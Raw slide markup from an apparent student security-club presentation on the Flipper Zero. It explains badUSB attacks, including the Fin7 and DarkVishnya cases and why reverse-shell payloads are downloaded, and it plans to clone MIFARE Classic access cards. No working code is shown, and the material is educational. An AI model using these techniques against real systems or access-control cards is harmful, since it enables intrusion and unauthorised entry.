                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Many people have made their own custom firmware for the flipper (RogueMaster, SquanchWare, Unleashed, Xtreme, so many more).</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f4ab8ba6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f4ab8ba6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f4ab8ba67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f4ab8ba67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07916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>A badUSB is a programmable usb that is used to execute a script when plugged into a device</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>The badUSB is often used to run malicious programs when plugged into a device such as a computer’s usb ports, a phone, or even a public kiosk such as self-serve photo booths.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>badUSB’s are also difficult to successfully use for malicious intents as the person must physically insert the bad usb into a USB port without being detected</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>badUSB’s also have a variety of use cases that aren’t as malicious. The device can automate IT tasks and can type thousands of words per minute</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>A pen tester could use it in their line of work or an IT professional setting up computers</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mon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67c16d2f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67c16d2f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Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Fin7: A ransomware operation run by the hacker group Fin7. Used badUSB’s to hack large companies by targeting employees. By impersonating the government or companies, they would send packages with letters and accompanying usb drives within them. They would convince the target to input the usb for gift cards or important information at which point the ransomware payload of the badUSB would be loaded onto the victim’s computer.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>DarkVishnya: Cybercriminals attacked multiple banks in eastern europe using bad USB’s by sneaking into central or regional branches posing as unsuspicious people such as couriers and job seekers. They would then connect their bash bunny device, with badUSB functionality, to create reverse shells and plant trojans. (Full list available in slide references). The attackers would connect to the reverse shell and gain access to the bank’s local network.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mon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8167de74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8167de74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Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>The reverse shell payload is downloaded rather than typed using a badUSB script because it is MUCH faster to plant the payload this way, which is important in a social engineering attack.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mon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67c16d2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67c16d2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Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>GUI r is synonymous to pressing Win+R to open the run box</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>STRING types the following string</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>The Flipper is used to download and execute the payload</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>The payload is downloaded because it is faster than using the Flipper’s badUSB feature to type the payload into the victim machine</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mon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flipperzero.one/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.androidauthority.com/what-is-nfc-270730/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=m0wXeSxQj9I" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://link.springer.com/content/pdf/10.1007/978-3-540-85893-5_20.pdf" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/darkvishnya/89169/" TargetMode="External"/><Relationship Id="rId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 y="-242225"/>
            <a:ext cx="4375977" cy="2286301"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Google Shape;55;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1866000" y="2126100"/>
            <a:ext cx="5412000" cy="891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FF8A0D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Flipper Zero</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF8A0D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56" name="Google Shape;56;p13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8407525" y="67075"/>
            <a:ext cx="736475" cy="736475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Google Shape;57;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3016925" y="2877125"/>
            <a:ext cx="315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8" name="Google Shape;58;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3084150" y="2861675"/>
            <a:ext cx="2975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Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>A club.eh Presentation</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2433750" y="1331850"/>
            <a:ext cx="4276500" cy="123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4000">
                <a:solidFill>
                  <a:srgbClr val="FF8A0D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Near Field Communication</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4000">
              <a:solidFill>
                <a:srgbClr val="FF8A0D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="136" name="Google Shape;136;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8407525" y="67075"/>
            <a:ext cx="736475" cy="736475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="137" name="Google Shape;137;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5247926" y="3107950"/>
            <a:ext cx="3896074" cy="2035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NFC - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF8A0D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Near Field Communication</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF8A0D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="Google Shape;143;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="240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Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>What is it?</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13.56 MHz high-frequency radio protocol</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Approximately 424 kbit/s transmission rate</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10cm range</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latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>How does it work?</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Flipper zero has a built in NFC module</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Flipper zero can be used for initiating and receiving NFC signals</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It can read, save, and emulate NFC cards</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="144" name="Google Shape;144;p23"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8407525" y="67075"/>
            <a:ext cx="736475" cy="736475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="145" name="Google Shape;145;p23"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5247926" y="3107950"/>
            <a:ext cx="3896074" cy="2035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NFC - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Tags and Cards</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>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51" name="Google Shape;151;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1127425"/>
            <a:ext cx="8520600" cy="8931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Font typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>The card and tag contain an antenna and 1024 bytes of EEPROM memory</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-325755" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Optional </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Symmetric Key Encryption using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>CRYPTO1 cipher</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="152" name="Google Shape;152;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8407525" y="67075"/>
            <a:ext cx="736475" cy="736475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="153" name="Google Shape;153;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="31832" l="0" r="26280" t="26331"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6293825" y="2991725"/>
            <a:ext cx="2850175" cy="2151774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Google Shape;154;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7043138" y="2455150"/>
            <a:ext cx="94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ADADAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Antenna</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="ADADAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="Google Shape;155;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3830575" y="3448825"/>
            <a:ext cx="240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EEPROM Integrated Circuit</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156" name="Google Shape;156;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7431350" y="2771850"/>
            <a:ext cx="167100" cy="517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rot="-5400000">
            <a:off x="6373025" y="3390025"/>
            <a:ext cx="167100" cy="517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NFC - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Access Control</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>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63" name="Google Shape;16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Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>We will Clone a MIFARE Classic 1KB tag and card</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latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>These NFC tokens are widely used for:</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i="1" lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Public Transportation Access Control</a:t>
            </a:r>
            <a:endParaRPr i="1">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i="1" lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Car Parking and Toll Collection</a:t>
            </a:r>
            <a:endParaRPr i="1">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i="1" lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Consumer Rewards Programs</a:t>
            </a:r>
            <a:endParaRPr i="1">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i="1" lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Campus ID </a:t>
            </a:r>
            <a:endParaRPr i="1">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i="1" lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Employee ID </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
